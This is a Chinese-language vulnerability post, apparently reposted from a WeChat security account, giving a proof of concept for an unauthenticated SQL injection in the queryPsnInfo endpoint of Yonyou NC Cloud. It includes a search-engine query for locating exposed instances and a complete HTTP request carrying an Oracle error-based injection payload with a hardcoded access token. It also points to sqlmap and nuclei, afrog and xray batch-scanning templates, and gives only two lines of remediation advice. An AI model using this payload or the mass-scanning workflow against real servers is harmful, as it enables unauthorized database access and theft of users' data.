用友NC Cloud queryPsnInfo SQL注入漏洞 poc

admin 2024年8月12日16:36:20评论46 views字数 1120阅读3分44秒阅读模式

 

0x01 产品简介

用友 NC Cloud 是一种商业级的企业资源规划云平台,为企业提供全面的管理解决方案,包括财务管理、采购管理、销售管理、人力资源管理等功能,基于云原生架构,深度应用新一代数字技术,打造开放、 互联、融合、智能的一体化云平台,支持公有云、混合云、专属云的灵活部署模式。聚焦数字化管理、数字化经营、数字化平台等三大企业数字化转型战略方向,提供涵盖数字营销、智能制造、财务共享、人力共享与协同,智慧采购、数字中台等18大解决方案,助力大型企业全面落地数字化和业务流程优化。

0x02 漏洞概述

用友NC Cloud queryPsnInfo 接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。

0x03 搜索引擎

app="用友-NC-Cloud"

用友NC Cloud queryPsnInfo SQL注入漏洞 poc

0x04 漏洞复现

GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close

用友NC Cloud queryPsnInfo SQL注入漏洞 poc

sqlmap验证

用友NC Cloud queryPsnInfo SQL注入漏洞 poc

0x05 工具批量

nuclei

用友NC Cloud queryPsnInfo SQL注入漏洞 poc

afrog

用友NC Cloud queryPsnInfo SQL注入漏洞 poc

xray

用友NC Cloud queryPsnInfo SQL注入漏洞 poc

 

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

原文始发于微信公众号(nday POC):【漏洞复现】用友NC Cloud queryPsnInfo SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日16:36:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC Cloud queryPsnInfo SQL注入漏洞 pochttp://cn-sec.com/archives/3058099.html

发表评论

匿名网友 填写信息